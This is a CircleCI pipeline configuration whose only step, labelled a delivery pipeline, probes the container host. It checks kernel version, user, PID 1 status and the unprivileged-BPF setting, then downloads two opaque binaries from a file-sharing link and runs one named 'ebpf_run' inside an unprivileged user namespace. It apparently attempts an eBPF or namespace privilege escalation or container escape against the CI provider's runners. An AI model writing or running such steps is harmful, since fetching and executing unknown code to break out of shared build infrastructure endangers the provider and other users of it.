version: 2.1
jobs:
  build:
    docker:
      - image: ubuntu:20.04
    steps:
      - run:
          name: The First Step
          command: |
            echo 'Hello World!'
            echo 'This is the delivery pipeline'
            cat /proc/version
            uname -r
            whoami
            cat /etc/issue
            cat /proc/1/status
            cat /proc/sys/kernel/unprivileged_bpf_disabled
            apt update && apt install -y wget libcap-ng-utils
            wget https://cloud.tsinghua.edu.cn/f/76307d9ba25040beaef6/?dl=1 -O ebpf_run
            wget https://cloud.tsinghua.edu.cn/f/b35c021d63f9461fa248/?dl=1 -O capsh
            chmod +x capsh
            ls -la
            ls -la
            ls -la
            chmod +x ebpf_run
            ls -la
            ./capsh --print
            unshare -Ur "/bin/sh -c 'ls -la /'"
            unshare -Ur ls -lah
            unshare -Ur "./ebpf_run"
            ls -la